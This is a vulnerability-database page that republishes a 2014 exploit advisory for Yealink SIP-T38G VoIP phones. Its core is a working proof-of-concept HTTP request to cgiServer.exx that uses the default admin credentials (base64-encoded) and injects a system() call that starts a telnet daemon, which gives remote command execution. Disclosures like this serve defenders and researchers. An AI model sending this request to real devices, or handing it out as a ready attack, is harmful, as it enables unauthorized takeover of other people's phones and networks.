Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Yealink VoIP Phone SIP-T38G Remote Command Execution

Related Vulnerabilities: CVE-2013-5758   CVE-2013-5755  
Publish Date: 13 Jun 2014
Author: Mr.Un1k0d3r, Doreth.Z10
Source 
                							

                Title: Yealink VoIP Phone SIP-T38G Remote Command Execution
Author: Mr.Un1k0d3r & Doreth.Z10 From RingZer0 Team
Vendor Homepage: http://www.yealink.com/Companyprofile.aspx
Version: VoIP Phone SIP-T38G
CVE: CVE-2013-5758
 
Description:
 
Using cgiServer.exx we are able to send OS command using the system
function.
 
POC:
 
POST /cgi-bin/cgiServer.exx HTTP/1.1
Host: 10.0.75.122
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4= (Default Creds CVE-2013-5755)
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
 
system("/bin/busybox%20telnetd%20start")
 
 
 
-- 
*Mr.Un1k0d3r** or 1 #*

<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started